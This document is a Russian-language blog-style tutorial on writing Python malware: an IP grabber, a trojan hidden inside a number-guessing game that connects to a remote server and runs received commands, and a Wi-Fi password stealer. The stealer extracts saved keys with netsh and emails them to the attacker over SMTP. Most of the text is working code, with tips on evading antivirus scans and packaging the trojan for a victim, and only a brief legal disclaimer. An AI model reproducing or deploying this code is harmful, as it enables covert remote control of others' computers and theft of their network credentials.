import smtplib as smtp import socket from getpass import getpass from requests import get hostname = socket.gethostname() local_ip = socket.gethostbyname(hostname) public_ip = get(‘http://api.ipify.org’).text email = ‘demo@spy-soft.net’ password = ‘***’ dest_email = ‘demo@spy-soft.net’ subject = ‘IP’ email_text = (f‘Host: {hostname}nLocal IP: {local_ip}nPublic IP: {public_ip}’) message = ‘From: {}nTo: {}nSubject: {}nn{}’.format(email, dest_email, subject, email_text) server = smtp.SMTP_SSL(‘smtp.yandex.com’) server.set_debuglevel(1) server.ehlo(email) server.login(email, password) server.auth_plain() server.sendmail(email, dest_email, message) server.quit() |
После запуска скрипта, получаем письмо.
Этот скрипт я проверил на VirusTotal. Результат на скрине.
Создание трояна на Python
По задумке, троян представляет собой клиент‑серверное приложение с клиентом на машине атакуемого и сервером на запускающей машине. Должен быть реализован максимальный удаленный доступ к системе.
Как обычно, начнем с библиотек:
import random import socket import threading import os |
Для начала напишем игру «Угадай число». Тут все крайне просто, поэтому задерживаться долго не буду.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
# Создаем функцию игры def game(): # Берем случайное число от 0 до 1000 number = random.randint(0, 1000) # Счетчик попыток tries = 1 # Флаг завершения игры done = False # Пока игра не закончена, просим ввести новое число while not done: guess = input(‘Введите число: ‘) # Если ввели число if guess.isdigit(): # Конвертируем его в целое guess = int(guess) # Проверяем, совпало ли оно с загаданным; если да, опускаем флаг и пишем сообщение о победе if guess == number: done = True print(f‘Ты победил! Я загадал {guess}. Ты использовал {tries} попыток.’) # Если же мы не угадали, прибавляем попытку и проверяем число на больше/меньше else: tries += 1 if guess > number: print(‘Загаданное число меньше!’) else: print(‘Загаданное число больше!’) # Если ввели не число — выводим сообщение об ошибке и просим ввести число заново else: print(‘Это не число от 0 до 1000!’) |
Зачем столько сложностей с проверкой на число? Можно было просто написать:
guess <wbr />= <wbr />int(<wbr />input(<wbr />‘Введите <wbr />число: <wbr />’)<wbr />) |
Если бы мы написали так, то при вводе чего угодно, кроме числа, выпадала бы ошибка, а этого допустить нельзя, так как ошибка заставит программу остановиться и обрубит соединение.
Вот код нашего трояна. Ниже мы будем разбираться, как он работает, чтобы не проговаривать заново базовые вещи.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
# Создаем функцию трояна def trojan(): # IP-адрес атакуемого HOST = ‘192.168.2.112’ # Порт, по которому мы работаем PORT = 9090 # Создаем эхо-сервер client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.connect((HOST, PORT)) while True: # Вводим команду серверу server_command = client.recv(1024).decode(‘cp866’) # Если команда совпала с ключевым словом ‘cmdon’, запускаем режим работы с терминалом if server_command == ‘cmdon’: cmd_mode = True # Отправляем информацию на сервер client.send(‘Получен доступ к терминалу’.encode(‘cp866’)) continue # Если команда совпала с ключевым словом ‘cmdoff’, выходим из режима работы с терминалом if server_command == ‘cmdoff’: cmd_mode = False # Если запущен режим работы с терминалом, вводим команду в терминал через сервер if cmd_mode: os.popen(server_command) # Если же режим работы с терминалом выключен — можно вводить любые команды else: if server_command == ‘hello’: print(‘Hello World!’) # Если команда дошла до клиента — выслать ответ client.send(f‘{server_command} успешно отправлена!’.encode(‘cp866’)) |
Сначала нужно разобраться, что такое сокет и с чем его едят. Сокет простым языком — это условная вилка или розетка для программ. Существуют клиентские и серверные сокеты: серверный прослушивает определенный порт (розетка), а клиентский подключается к серверу (вилка). После того как установлено соединение, начинается обмен данными.
Следующая строка:
client <wbr />= <wbr />socket.<wbr />socket(<wbr />socket.<wbr />AF_INET, <wbr />socket.<wbr />SOCK_STREAM) |
создает эхо‑сервер (отправили запрос — получили ответ).
AF_INET означает работу с IPv4-адресацией, а
SOCK_STREAM указывает на то, что мы используем TCP-подключение вместо UDP, где пакет посылается в сеть и далее не отслеживается.
Строка:
client.<wbr />connect((<wbr />HOST, <wbr />PORT)<wbr />) |
указывает IP-адрес хоста и порт, по которым будет производиться подключение, и сразу подключается.
Функция
client.<wbr />recv(<wbr />1024) принимает данные из сокета и является так называемым «блокирующим вызовом». Смысл такого вызова в том, что, пока команда не передастся или не будет отвергнута другой стороной, вызов будет продолжать выполняться. 1024 — это количество задействованных байтов под буфер приема.
Нельзя будет принять больше 1024 байт (1 Кбайт) за один раз, но нам это и не нужно: часто вы руками вводите в консоль больше 1000 символов? Пытаться многократно увеличить размер буфера не нужно — это затратно и бесполезно, так как нужен большой буфер примерно раз в никогда.
Команда
decode(<wbr />‘cp866’) декодирует полученный байтовый буфер в текстовую строку согласно заданной кодировке (у нас 866). Но почему именно
cp866? Зайдем в командную строку и введем команду
chcp.
Кодировка по умолчанию для русскоговорящих устройств — 866, где кириллица добавлена в латиницу. В англоязычных версиях системы используется обычный Unicode, то есть
utf—8 в Python. Мы же говорим на русском языке, так что поддерживать его нам просто необходимо.
При желании кодировку можно поменять в командной строке, набрав после
chcp ее номер. Юникод имеет номер 65001.
При приеме команды нужно определить, не служебная ли она. Если так, выполняем определенные действия, иначе, если включен терминал, перенаправляем команду туда. Недостаток — результат выполнения так и остается необработанным, а его хорошо бы отправлять нам. Это будет вам домашним заданием: реализовать эту функцию можно от силы минут за пятнадцать, даже если гуглить каждый шаг.
Результат проверки клиента на VirusTotal порадовал.
Базовый троян написан, и сейчас можно сделать очень многое на машине атакуемого, ведь у нас доступ к командной строке. Но почему бы нам не расширить набор функций? Давайте еще пароли от WiFi!
Создание WiFi-стилера на Python
Задача — создать скрипт, который из командной строки узнает все пароли от доступных сетей Wi-Fi.
Приступаем. Импорт библиотек:
import subprocess import time |
Модуль
subprocess нужен для создания новых процессов и соединения с потоками стандартного ввода‑вывода, а еще для получения кодов возврата от этих процессов.
Итак, скрипт для извлечения паролей WiFi:
# Создаем запрос в командной строке netsh wlan show profiles, декодируя его по кодировке в самом ядре data = subprocess.check_output([‘netsh’, ‘wlan’, ‘show’, ‘profiles’]).decode(‘cp866’).split(‘n’) # Создаем список всех названий всех профилей сети (имена сетей) Wi—Fis = [line.split(‘:’)[1][1:—1] for line in data if «Все профили пользователей» in line] # Для каждого имени… for Wi—Fi in Wi—Fis: # …вводим запрос netsh wlan show profile [ИМЯ_Сети] key=clear results = subprocess.check_output([‘netsh’, ‘wlan’, ‘show’, ‘profile’, Wi—Fi, ‘key=clear’]).decode(‘cp866’).split(‘n’) # Забираем ключ results = [line.split(‘:’)[1][1:—1] for line in results if «Содержимое ключа» in line] # Пытаемся его вывести в командной строке, отсекая все ошибки try: print(f‘Имя сети: {Wi-Fi}, Пароль: {results[0]}’) except IndexError: print(f‘Имя сети: {Wi-Fi}, Пароль не найден!’) |
Введя команду в командной строке:
netsh <wbr />wlan <wbr />show <wbr />profiles |
Mы получим следующее.
Если распарсить вывод выше и подставить имя сети в команду:
netsh <wbr />wlan <wbr />show <wbr />profile [<wbr />имя <wbr />сети] <wbr />key=clear |
Результат будет как на картинке. Его можно разобрать и вытащить пароль от сети.
Осталась одна проблема: наша изначальная задумка была забрать пароли себе, а не показывать их пользователю. Исправим же это.
Допишем еще один вариант команды в скрипт, где обрабатываем наши команды из сети.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
if server_command == ‘Wi-Fi’: data = subprocess.check_output([‘netsh’, ‘wlan’, ‘show’, ‘profiles’]).decode(‘cp866’).split(‘n’) Wi—Fis = [line.split(‘:’)[1][1:—1] for line in data if «Все профили пользователей» in line] for Wi—Fi in Wi—Fis: results = subprocess.check_output([‘netsh’, ‘wlan’, ‘show’, ‘profile’, Wi—Fi, ‘key=clear’]).decode(‘cp866’).split(‘n’) results = [line.split(‘:’)[1][1:—1] for line in results if «Содержимое ключа» in line] try: email = ‘mail@yandex.ru’ password = ‘***’ dest_email = ‘demo@demo.ru’ subject = ‘Wi-Fi’ email_text = (f‘Name: {Wi-Fi}, Password: {results[0]}’) message = ‘From: {}nTo: {}nSubject: {}nn{}’.format(email, dest_email, subject, email_text) server = smtp.SMTP_SSL(‘smtp.yandex.com’) server.set_debuglevel(1) server.ehlo(email) server.login(email, password) server.auth_plain() server.sendmail(email, dest_email, message) server.quit() except IndexError: email = ‘mail@yandex.ru’ password = ‘***’ dest_email = ‘demo@demo.ru’ subject = ‘Wi-Fi’ email_text = (f‘Name: {Wi-Fi}, Password not found!’) message = ‘From: {}nTo: {}nSubject: {}nn{}’.format(email, dest_email, subject, email_text) server = smtp.SMTP_SSL(‘smtp.yandex.com’) server.set_debuglevel(1) server.ehlo(email) server.login(email, password) server.auth_plain() server.sendmail(email, dest_email, message) server.quit() |
Этот скрипт прост как два рубля и ожидает увидеть русскоязычную систему. На других языках это не сработает, но исправить поведение скрипта можно простым выбором разделителя из словаря, где ключ — обнаруженный на компьютере язык, а значение — требуемая фраза на нужном языке.
Все команды этого скрипта уже подробно разобраны, так что я не буду повторяться, а просто покажу скриншот из своей почты.
Доработки
Конечно, тут можно доработать примерно все — от защиты канала передачи до защиты самого кода нашего вредоноса. Методы связи с управляющими серверами злоумышленника тоже обычно используются другие, а работа вредоноса не зависит от языка операционной системы.
И конечно, сам троян очень желательно упаковать с помощью PyInstaller, чтобы не тянуть с собой на машину жертвы питон и все зависимости. Игра, которая требует для работы установить модуль для работы с почтой, — что может больше внушать доверие?
Заключение
Сегодняшний троян настолько прост, что его никак нельзя назвать боевым. Тем не менее он полезен для изучения основ языка Python и понимания алгоритмов работы более сложных вредоносных программ. Мы надеемся, что вы уважаете закон, а полученные знания о троянах вам никогда не понадобятся.
В качестве домашнего задания рекомендую попробовать реализовать двусторонний терминал и шифрование данных хотя бы с помощью XOR. Такой троян уже будет куда интереснее, но, безусловно, использовать его in the wild мы не призываем. Будьте аккуратны и не делайте глупостей!
Еще по теме: Как создать троян для Android